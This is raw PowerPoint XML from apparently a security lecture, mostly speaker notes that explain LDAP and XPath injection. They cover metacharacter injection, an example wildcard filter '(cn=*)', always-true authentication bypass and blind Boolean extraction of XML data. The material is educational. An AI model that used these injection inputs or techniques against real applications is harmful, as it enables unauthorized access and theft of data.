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309" r:id="rId12"/>
    <p:sldId id="310" r:id="rId13"/>
    <p:sldId id="311" r:id="rId14"/>
    <p:sldId id="314" r:id="rId15"/>
    <p:sldId id="312" r:id="rId16"/>
    <p:sldId id="313"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306" r:id="rId43"/>
    <p:sldId id="307" r:id="rId44"/>
    <p:sldId id="308" r:id="rId45"/>
    <p:sldId id="297" r:id="rId46"/>
    <p:sldId id="298" r:id="rId47"/>
    <p:sldId id="299" r:id="rId48"/>
    <p:sldId id="303" r:id="rId49"/>
    <p:sldId id="305" r:id="rId50"/>
    <p:sldId id="304" r:id="rId5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13" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="166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A218F-5CE1-4938-ABC7-4DEE9A7B12D6}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>27/11/2019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561EBF-21F8-468E-8D77-03247B7DE346}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3135115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0561EBF-21F8-468E-8D77-03247B7DE346}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="541407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goal of LDAP injection attacks is to inject LDAP search filters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>metacharacters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> in a query which will be executed by the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>An LDAP search filter is constructed in Polish notation</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21</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2863342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filter will look like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>searchfilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=*)" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>which matches every object with a '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>' attribute equals to anything.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>If the application is vulnerable to LDAP injection, it will display some or all of the users' attributes, depending on the application's execution flow and the permissions of the LDAP connected user.</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tester could use a trial-and-error approach, by inserting in the parameter '(', '|', '&amp;', '*' and the other characters, in order to check the application for errors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="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22</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169023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If a web application uses LDAP to check user credentials during the login process and it is vulnerable to LDAP injection, it is possible to bypass the authentication check by injecting an always true LDAP query (in a similar way to SQL and XPATH injection ).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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23</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2438400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 i.e. the complete database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These results enable an automated attack to fit any XPath based application provided that it possesses the basic security hole. Indeed, such </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of concept script was written and demonstrated on various XPath implementations</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26</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2586390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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>contexts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>directly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> (i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a database software), and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>natively</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>supported</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> – e.g. in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Microsoft’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> .NET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> and in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Macromedia's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>ColdFusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>/MX. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>, for login processing, for data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>retrieval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>, and in short, for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>flexible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>lightweight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>tasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker, upon spotting an XPath Injection vulnerability in an XPath based application does not need to fully understand/guess the XPath query. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As of that moment, an automated script (which is implemented, but not provided in this paper) can be used to extract the complete XML document that is the underlying database. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It should be stressed that the attacker does not need to know the exact structure of the XPath query, and moreover, since an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>XML document has no access control/privilege system associated with it, the attacker is able to extract the document (database) in its completeness -unlike in SQL injection, where the attacker is limited to the privileges of the database account used by the application. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" i="1" u="sng"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28</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2420888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Microsoft ASP.NET and C#</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29</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4160317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some cases, it might be possible to obtain information from the system if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the XPath expression returns data from the XML document that is later displayed to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the user (attacker). For example, the above code could have displayed the account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>number of the logged-in account in the HTML response. In this case, the attacker can</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>further manipulate the XPath query to force the server to return various parts of the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"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Note, however, that in this case, while it is possible to extract most of the data from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the database, some prior knowledge on the XPath query is needed. Without knowing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the exact format of the query, it’s very hard to figure out exactly how to form the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>injection string. This is especially true if error messages are suppressed. Note it is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>also impossible, in this manner, to extract non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>nodeset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> expressions (e.g. count() and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"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There are many cases in which no XML data is sent directly to the user. In that case,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the above attack (and similar attacks) is not applicable.</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30</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3385720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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>crawling</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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procedure assumes no knowledge of the document structure, yet at its end, the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>document, in its completeness is reconstructed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Boolean</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query</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is</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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query whose result is a Boolean value (true/false). So in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Booleanization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> process, a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>query whose result type is string or numeric is replaced with a series of queries whose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>result type is Boolean, and from which we can reconstruct the result of the original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>string or numeric query. This is explained in detail below.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>That</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is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we</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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show how it is possible to form an injection string, including the Boolean query, that,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>when injected into an XPath query, causes the application to behave in one way if the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Boolean query resolves into “true”, and in another way if the query resolves into</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>“false”. This way, the attacker can determine a single bit – the Boolean query result.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>It uses only a difference in the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>application behavior resulting from a difference in the XPath query return value to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>extract a single information bit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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32</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4148519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 annoying quirk of XPath 1.0 is that it’s possible to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
